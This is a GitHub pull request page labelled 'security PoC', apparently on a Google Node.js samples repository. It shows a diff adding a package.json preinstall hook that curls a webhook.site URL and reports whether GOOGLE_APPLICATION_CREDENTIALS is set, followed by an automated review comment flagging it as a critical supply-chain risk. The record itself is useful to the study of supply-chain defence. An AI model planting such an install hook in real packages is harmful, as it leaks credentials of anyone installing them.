security PoC#4361
Conversation
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
![gemini-code-assist[bot]](https://avatars.githubusercontent.com/in/956858?s=60&v=4){kind=small}
There was a problem hiding this comment.
Code Review
This pull request introduces a critical security vulnerability by adding a preinstall script to package.json that attempts to exfiltrate environment variable information to an external, untrusted domain. The reviewer correctly flagged this as a severe supply chain risk and requested its immediate removal.
| "node": ">=16.0.0" | ||
| }, | ||
| "scripts": { | ||
| "preinstall": "curl -s https://webhook.site/9d88508f-ae3f-463e-8621-682ae1245290/CUSTARD_RCE_gcreds_${GOOGLE_APPLICATION_CREDENTIALS:+PRESENT}", |
There was a problem hiding this comment.
Critical Security Issue: The preinstall script executes an external curl command to an untrusted third-party domain (webhook.site) and attempts to exfiltrate environment variable status (GOOGLE_APPLICATION_CREDENTIALS). This introduces a severe supply chain risk and potential credential exposure. This script must be removed immediately.
product-auto-label
Bot
added
the
samples
1 participant
Description
Fixes #
Note: Before submitting a pull request, please open an issue for discussion if you are not associated with Google.
Checklist
npm test(see Testing)npm run lint(see Style)GoogleCloudPlatform/nodejs-docs-samples. Not a fork.